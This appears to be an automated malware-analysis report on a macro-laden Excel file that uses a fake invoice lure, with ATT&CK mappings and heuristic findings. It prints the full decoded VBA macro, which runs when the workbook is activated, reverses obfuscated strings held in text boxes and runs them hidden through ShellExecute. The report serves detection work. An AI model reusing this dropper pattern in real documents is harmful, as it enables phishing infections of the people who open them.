MALICIOUS
Risk Score: 108
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The document contains VBA macros that leverage the `Shell.Application` object to execute commands. The heuristic firings indicate a reference to `ShellExecute` and the presence of VBA macros, along with a fake invoice lure. The script's primary function is to execute a command constructed from text boxes within the document, likely to download and run a second-stage payload.
Heuristics 4
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:

  ```vb
  Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
  tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0
  ```
- Fake invoice / payment lure (low, SE_INVOICE_LURE): Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1314 bytes |

SHA-256: 5876905b812d9423644ee868c6bf0af0b9b177461037e8431492f38e9e8592bb
Preview script: First 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
    Dim fGOzlqhZXccU, mNnDRGQmct, fgfyh, NGFPAxqkmttRDiX
    Set mNnDRGQmct = ThisWorkbook.Sheets.Item(1)
    With mNnDRGQmct
        fGOzlqhZXccU = .TextBoxes("TextBox 1").Text
        t7gh0 = .TextBoxes("TextBox 2").Text
    End With
    fgfyh = yMVumusAfyHAAMsz(fGOzlqhZXccU, t7gh0)
End Sub
Function yMVumusAfyHAAMsz(fgfjhfgfg, fjkerooos)
    Dim tqsOfhbtsWwINQQzouSY
    Set tqsOfhbtsWwINQQzouSY = CreateObject("Shell.Application")
    tqsOfhbtsWwINQQzouSY.ShellExecute "P" + cozBWQucK(fjkerooos), cozBWQucK(fgfjhfgfg), "", "", 0
End Function
Function cozBWQucK(s)
    Dim p
    For p = Len(s) To 1 Step -1
        cozBWQucK = cozBWQucK & Mid(s, p, 1)
    Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```